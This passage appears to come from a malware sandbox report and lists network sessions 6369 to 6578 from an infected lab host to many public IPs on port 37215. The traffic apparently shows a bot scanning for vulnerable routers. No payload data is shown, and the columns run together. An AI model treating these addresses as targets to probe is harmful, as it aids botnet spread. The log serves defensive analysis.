                                                          6369192.168.2.155940041.8.170.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6370192.168.2.155253017.8.44.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6371192.168.2.1539718157.14.253.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6372192.168.2.155777641.50.155.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6373192.168.2.1541496157.129.42.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6374192.168.2.155285041.54.5.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6375192.168.2.1544168157.41.25.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6376192.168.2.1533220157.212.112.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6377192.168.2.1552038197.249.70.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6378192.168.2.155035092.209.191.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6379192.168.2.1549022157.118.196.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6380192.168.2.1533342157.130.247.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6381192.168.2.1553452197.65.26.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6382192.168.2.1554166152.231.22.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6383192.168.2.155536041.129.126.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6384192.168.2.1539538157.240.202.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6385192.168.2.1542138197.123.104.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6386192.168.2.15529705.241.136.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6387192.168.2.1539730203.2.51.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6388192.168.2.1551706157.42.147.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6389192.168.2.1541388197.247.156.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6390192.168.2.1557730157.17.111.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6391192.168.2.1534628175.221.123.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6392192.168.2.1549478197.36.127.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6393192.168.2.1554960157.232.73.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6394192.168.2.1536316197.75.229.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6395192.168.2.1541894157.97.63.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6396192.168.2.1552418197.60.99.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6397192.168.2.153623641.155.11.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6398192.168.2.1538844125.63.47.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6399192.168.2.1551476157.2.89.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6400192.168.2.1547840197.1.85.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6401192.168.2.153829841.152.233.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6402192.168.2.156092641.222.163.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6403192.168.2.154873641.167.85.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6404192.168.2.1556550197.11.65.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6405192.168.2.1556994192.126.200.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6406192.168.2.154245041.93.140.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6407192.168.2.1533342142.59.143.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6408192.168.2.154305641.181.24.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6409192.168.2.1533990157.243.193.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6410192.168.2.1546668173.221.253.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6411192.168.2.155590663.157.69.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6412192.168.2.153361841.225.139.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6413192.168.2.155093641.67.176.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6414192.168.2.154454632.255.236.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6415192.168.2.154302841.147.24.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6416192.168.2.153595441.221.189.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6417192.168.2.1548502197.230.36.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6418192.168.2.153708241.114.192.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6419192.168.2.154291641.52.241.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6420192.168.2.1556320157.134.194.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6421192.168.2.1558464157.168.4.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6422192.168.2.154156841.154.242.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6423192.168.2.1557402157.172.147.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6424192.168.2.155925041.181.116.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6425192.168.2.1550170176.204.149.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6426192.168.2.1550876197.51.119.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6427192.168.2.1552252197.99.6.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6428192.168.2.154151641.223.120.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6429192.168.2.155080641.159.45.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6430192.168.2.1549338157.60.248.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6431192.168.2.154716641.221.212.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6432192.168.2.1541372197.171.45.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6433192.168.2.1545664166.20.230.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6434192.168.2.1550222191.114.53.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6435192.168.2.1536534197.201.214.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6436192.168.2.1548234151.93.186.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6437192.168.2.154876441.147.6.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6438192.168.2.155638641.147.112.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6439192.168.2.1559680187.162.105.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6440192.168.2.155947080.115.16.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6441192.168.2.1550116157.151.28.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6442192.168.2.154580041.4.88.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6443192.168.2.1539822197.78.225.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6444192.168.2.1536468157.105.196.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6445192.168.2.1544244151.188.194.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6446192.168.2.1556376197.46.108.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6447192.168.2.1560276157.214.198.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6448192.168.2.1560836144.114.203.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6449192.168.2.1551626213.195.97.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6450192.168.2.1536636105.163.140.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6451192.168.2.1554584197.48.178.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6452192.168.2.153541041.124.119.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6453192.168.2.1559216157.192.193.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6454192.168.2.1538438197.126.72.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6455192.168.2.1546488197.129.14.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6456192.168.2.1555474157.35.185.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6457192.168.2.1534680157.202.214.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6458192.168.2.1556460197.15.19.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6459192.168.2.1549628209.157.96.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6460192.168.2.1544734197.80.192.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6461192.168.2.156000665.36.50.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6462192.168.2.1544340157.232.24.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6463192.168.2.1543996197.148.172.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6464192.168.2.1546426119.195.115.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6465192.168.2.1552442157.244.225.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6466192.168.2.155141441.81.20.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6467192.168.2.1548224185.34.132.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6468192.168.2.1553150157.5.32.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6469192.168.2.153939692.28.148.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6470192.168.2.1549882197.33.46.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6471192.168.2.1548078157.97.249.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6472192.168.2.154227041.65.195.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6473192.168.2.154869441.220.160.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6474192.168.2.1545396157.31.3.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6475192.168.2.154352274.118.118.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6476192.168.2.1545922197.30.228.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6477192.168.2.1558820157.162.88.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6478192.168.2.1547828157.224.76.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6479192.168.2.155257041.136.136.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6480192.168.2.1533590197.222.132.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6481192.168.2.154263641.210.121.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6482192.168.2.153576441.178.248.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6483192.168.2.154986878.147.229.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6484192.168.2.1555992197.31.74.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6485192.168.2.155254641.63.45.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6486192.168.2.154534041.126.103.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6487192.168.2.1544592157.59.97.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6488192.168.2.1554080175.54.172.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6489192.168.2.1545196157.250.6.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6490192.168.2.153784853.34.138.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6491192.168.2.1559558197.205.254.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6492192.168.2.1533032143.134.69.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6493192.168.2.154435042.61.37.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6494192.168.2.1560376197.183.200.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6495192.168.2.1554782197.232.95.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6496192.168.2.156019841.130.157.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6497192.168.2.154519441.187.98.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6498192.168.2.1548900197.42.80.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6499192.168.2.1533766108.235.48.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6500192.168.2.1537362153.192.234.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6501192.168.2.1558308157.222.223.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6502192.168.2.1560064157.249.174.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6503192.168.2.156067041.225.38.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6504192.168.2.1559368197.52.42.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6505192.168.2.1538038197.156.166.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6506192.168.2.154219441.13.40.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6507192.168.2.1553090142.172.74.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6508192.168.2.1552562157.169.96.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6509192.168.2.1547902201.154.147.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6510192.168.2.153440041.64.49.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6511192.168.2.1535420157.71.17.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6512192.168.2.1547082157.206.66.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6513192.168.2.153454442.196.250.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6514192.168.2.1552372157.135.252.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6515192.168.2.1557666170.14.0.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6516192.168.2.154340819.202.241.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6517192.168.2.154726641.249.148.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6518192.168.2.155380841.185.24.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6519192.168.2.153547441.6.144.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6520192.168.2.1538658162.70.93.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6521192.168.2.1559138157.76.235.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6522192.168.2.1542542201.186.81.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6523192.168.2.1545134115.26.243.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6524192.168.2.1539792197.9.105.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6525192.168.2.1557892197.219.229.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6526192.168.2.1537024157.235.100.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6527192.168.2.1537630157.144.95.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6528192.168.2.1551798157.15.0.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6529192.168.2.153509641.94.148.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6530192.168.2.1545640197.32.126.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6531192.168.2.1539608157.201.22.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6532192.168.2.1543516165.100.150.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6533192.168.2.1537254157.137.130.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6534192.168.2.1537742197.240.232.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6535192.168.2.1541352157.245.123.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6536192.168.2.1533282157.30.251.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6537192.168.2.1541812197.14.91.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6538192.168.2.153401641.234.81.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6539192.168.2.1542234157.221.72.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6540192.168.2.1541794197.238.50.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6541192.168.2.1558224157.67.18.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6542192.168.2.1543380197.55.204.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6543192.168.2.154543634.51.126.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6544192.168.2.154300084.126.146.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6545192.168.2.1559704157.164.98.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6546192.168.2.155462676.249.182.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6547192.168.2.1558764185.120.153.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6548192.168.2.1538086197.218.37.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6549192.168.2.154942041.41.203.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6550192.168.2.1551726157.204.4.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6551192.168.2.1542790157.174.241.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6552192.168.2.1533170163.230.192.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6553192.168.2.1546332197.111.116.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6554192.168.2.1544908197.251.77.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6555192.168.2.1534738143.114.243.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6556192.168.2.155405641.102.238.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6557192.168.2.1539992157.248.114.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6558192.168.2.1537826197.8.116.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6559192.168.2.1548310157.208.19.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6560192.168.2.1549700164.196.102.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6561192.168.2.1542186157.72.216.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6562192.168.2.1539642157.128.201.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6563192.168.2.1560512157.79.85.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6564192.168.2.1559572157.232.100.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6565192.168.2.1558520197.127.78.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6566192.168.2.1545224157.96.36.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6567192.168.2.1546436108.39.0.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6568192.168.2.1537142197.82.92.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6569192.168.2.1540676157.102.104.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6570192.168.2.155879041.83.210.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6571192.168.2.156038641.105.145.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6572192.168.2.1534776157.16.21.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6573192.168.2.154053437.26.174.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6574192.168.2.1556170164.8.173.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6575192.168.2.1552150157.180.10.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6576192.168.2.1551856197.238.9.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6577192.168.2.153871041.66.222.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6578192.168.2.1538524157.118.8.3137215
